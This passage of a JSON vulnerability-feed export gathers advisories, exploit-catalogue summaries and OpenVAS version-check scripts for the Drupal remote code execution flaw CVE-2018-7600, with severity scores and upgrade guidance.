["CVE-2018-7600"], "modified": "2018-04-25T00:00:00", "id": "SAINT:E218D6FA073276BB012BADF2CCE50F0E", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/drupal_form_api", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-08T15:36:52", "description": "Added: 04/25/2018 \nCVE: [CVE-2018-7600](<https://vulners.com/cve/CVE-2018-7600>) \nBID: [103534](<http://www.securityfocus.com/bid/103534>) \n\n\n### Background\n\n[Drupal](<https://www.drupal.org/>) is an open-source content management system written in PHP. \n\n### Problem\n\nInsufficient sanitization on Form API AJAX requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\n[Upgrade](<https://www.drupal.org/download>) to Drupal 7.58, 8.3.9, 8.4.6, 8.5.1, or higher. \n\n### References\n\n<https://www.drupal.org/sa-core-2018-002> \n<https://research.checkpoint.com/uncovering-drupalgeddon-2/> \n\n\n### Limitations\n\nExploit works on Drupal 8.x running on Linux. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-25T00:00:00", "type": "saint", "title": "Drupal Form API command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-25T00:00:00", "id": "SAINT:420D07B85504086850EFAA31B8BCAEB5", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/drupal_form_api", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-07-21T08:19:34", "description": "\nJasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.\n\n\nFor further information please refer to the official upstream advisory\nat <https://www.drupal.org/sa-core-2018-002.>\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n7.14-2+deb7u18.\n\n\nWe recommend that you upgrade your drupal7 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-28T00:00:00", "type": "osv", "title": "drupal7 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-07-21T05:52:04", "id": "OSV:DLA-1325-1", "href": "https://osv.dev/vulnerability/DLA-1325-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T08:24:04", "description": "\nA remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. For additional information,\nplease refer to the upstream advisory at\n<https://www.drupal.org/sa-core-2018-002>\n\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u11.\n\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u3.\n\n\nWe recommend that you upgrade your drupal7 packages.\n\n\nFor the detailed security status of drupal7 please refer to its security\ntracker page at:\n<https://security-tracker.debian.org/tracker/drupal7>\n\n\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "osv", "title": "drupal7 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2022-07-21T05:49:48", "id": "OSV:DSA-4156-1", "href": "https://osv.dev/vulnerability/DSA-4156-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:24:55", "description": "A code execution vulnerability exists in Drupal Core. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "checkpoint_advisories", "title": "Drupal Core Remote Code Execution (CVE-2018-7600)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-02-20T00:00:00", "id": "CPAI-2018-0192", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:12:02", "description": "A code execution vulnerability exists in Drupal Core. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-11-05T00:00:00", "type": "checkpoint_advisories", "title": "Drupal Core Form Rendering Remote Code Execution (CVE-2018-7600)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2020-11-05T00:00:00", "id": "CPAI-2018-1697", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-10-21T21:32:44", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4156-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMarch 29, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : drupal7\nCVE ID : CVE-2018-7600\nDebian Bug : 894259\n\nA remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. For additional information,\nplease refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-002\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u3.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFor the detailed security status of drupal7 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/drupal7\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-28T22:31:37", "type": "debian", "title": "[SECURITY] [DSA 4156-1] drupal7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-28T22:31:37", "id": "DEBIAN:DSA-4156-1:CE193", "href": "https://lists.debian.org/debian-security-announce/2018/msg00082.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-03T04:32:22", "description": "Package : drupal7\nVersion : 7.14-2+deb7u18\nCVE ID : CVE-2018-7600\n\nJasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.\n\nFor further information please refer to the official upstream advisory\nat https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-28T22:42:25", "type": "debian", "title": "[SECURITY] [DLA 1325-1] drupal7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-28T22:42:25", "id": "DEBIAN:DLA-1325-1:E895C", "href": "https://lists.debian.org/debian-lts-announce/2018/03/msg00028.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T12:59:37", "description": "Package : drupal7\nVersion : 7.14-2+deb7u18\nCVE ID : CVE-2018-7600\n\nJasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.\n\nFor further information please refer to the official upstream advisory\nat https://www.drupal.org/sa-core-2018-002.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-28T22:42:25", "type": "debian", "title": "[SECURITY] [DLA 1325-1] drupal7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-28T22:42:25", "id": "DEBIAN:DLA-1325-1:426F0", "href": "https://lists.debian.org/debian-lts-announce/2018/03/msg00028.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-18T23:49:45", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4156-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMarch 29, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : drupal7\nCVE ID : CVE-2018-7600\nDebian Bug : 894259\n\nA remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework. For additional information,\nplease refer to the upstream advisory at\nhttps://www.drupal.org/sa-core-2018-002\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u3.\n\nWe recommend that you upgrade your drupal7 packages.\n\nFor the detailed security status of drupal7 please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/drupal7\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-28T22:31:37", "type": "debian", "title": "[SECURITY] [DSA 4156-1] drupal7 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-28T22:31:37", "id": "DEBIAN:DSA-4156-1:C1814", "href": "https://lists.debian.org/debian-security-announce/2018/msg00082.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Drupal module configuration vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-7600", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:32:34", "description": "This host is running Drupal and is prone\n to critical remote code execution vulnerability.", "cvss3": {}, "published": "2018-03-29T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Windows, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310812583", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812583", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-002_win.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Windows, Version Check)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812583\");\n script_version(\"$Revision: 12012 $\");\n script_cve_id(\"CVE-2018-7600\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-29 09:55:26 +0530 (Thu, 29 Mar 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Windows, Version Check)\");\n\n script_tag(name:\"summary\", value:\"This host is running Drupal and is prone\n to critical remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists within multiple subsystems\n of Drupal. This potentially allows attackers to exploit multiple attack\n vectors on a Drupal site, which could result in the site being completely\n compromised.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and completely compromise the site.\");\n\n script_tag(name:\"affected\", value:\"Drupal core versions 6.x and earlier,\n\n Drupal core versions 8.2.x and earlier,\n\n Drupal core versions 8.3.x to before 8.3.9,\n\n Drupal core versions 8.4.x to before 8.4.6,\n\n Drupal core versions 8.5.x to before 8.5.1 and\n\n Drupal core versions 7.x to before 7.58 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Drupal core version 8.3.9 or\n 8.4.6 or 8.5.1 or 7.58 or later. Please see the referenced links for available updates.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/psa-2018-001\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-002\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_xref(name:\"URL\", value:\"https://research.checkpoint.com/uncovering-drupalgeddon-2/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_windows\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!drupalPort = get_app_port(cpe:CPE)) {\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:drupalPort, version_regex:\"^([0-9]+)\", exit_no_version:TRUE)) {\n exit(0);\n}\n\ndrupalVer = infos['version'];\npath = infos['location'];\n\nif(drupalVer =~ \"^(6\\.)\") {\n fix = \"Drupal 6 is End of Life.please contact a D6LTS vendor\";\n}\n\nif(drupalVer =~ \"^(8\\.2)\" || drupalVer == \"8.5.0\"){\n fix = \"8.5.1\";\n}\n\nif(drupalVer =~ \"^(8\\.)\" && version_in_range(version:drupalVer, test_version:\"8.3.0\", test_version2:\"8.3.8\")) {\n fix = \"8.3.9\";\n}\n\nif(drupalVer =~ \"^(8\\.)\" && version_in_range(version:drupalVer, test_version:\"8.4.0\", test_version2:\"8.4.5\")) {\n fix = \"8.4.6\";\n}\n\nif(drupalVer =~ \"^(7\\.)\" && version_in_range(version:drupalVer, test_version:\"7.0\", test_version2:\"7.57\")) {\n fix = \"7.58\";\n}\n\nif(fix) {\n report = report_fixed_ver(installed_version:drupalVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:drupalPort);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:34", "description": "This host is running Drupal and is prone\n to critical remote code execution vulnerability.", "cvss3": {}, "published": "2018-03-29T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Linux, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310812584", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812584", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-002_lin.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Linux, Version Check)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812584\");\n script_version(\"$Revision: 12012 $\");\n script_cve_id(\"CVE-2018-7600\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-29 10:53:12 +0530 (Thu, 29 Mar 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Linux, Version Check)\");\n\n script_tag(name:\"summary\", value:\"This host is running Drupal and is prone\n to critical remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists within multiple subsystems\n of Drupal. This potentially allows attackers to exploit multiple attack\n vectors on a Drupal site, which could result in the site being completely\n compromised.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and completely compromise the site.\");\n\n script_tag(name:\"affected\", value:\"Drupal core versions 6.x and earlier,\n\n Drupal core versions 8.2.x and earlier,\n\n Drupal core versions 8.3.x to before 8.3.9,\n\n Drupal core versions 8.4.x to before 8.4.6,\n\n Drupal core versions 8.5.x to before 8.5.1 and\n\n Drupal core versions 7.x to before 7.58 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Drupal core version 8.3.9 or\n 8.4.6 or 8.5.1 or 7.58 or later. Please see the referenced links for available updates.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/psa-2018-001\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-002\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_xref(name:\"URL\", value:\"https://research.checkpoint.com/uncovering-drupalgeddon-2/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_unixoide\");\n 